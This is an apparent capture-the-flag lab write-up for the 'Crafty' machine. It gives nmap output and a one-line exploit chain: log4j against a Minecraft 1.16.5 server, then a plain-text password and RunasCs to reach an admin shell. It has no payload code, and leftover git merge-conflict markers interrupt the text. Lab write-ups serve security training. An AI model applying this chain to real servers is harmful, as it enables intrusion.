3. Crafty

3.1. Machine Info

image-20240211110224387

<<<<<<< HEAD

3.2. Recon

3.2.1. port

  • nmap

PORT      STATE SERVICE   VERSION
80/tcp    open  http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

3.2.2. web

  • path: nothing special

  • subdomain: nothing special

3.2.3. minecraft 1.16.5

Download using HMCL-dev/HMCL: A Minecraft Launcher which is multi-functional, cross-platform and popular

image-20240211110619037

image-20240211110655232

3.3. Foothold

=======

38e3e6a ([+] Add season4 machine info.)

Notice: the full version of write-up is here.

3.4. Exploit Chain

port scan -> 80 http, 25565 minecraft 1.16.5 -> which is vuln for log4j -> svc_minecraft shell -> enumerate jar files of minecraft server -> discover plain-text password & RunasCs -> admin shell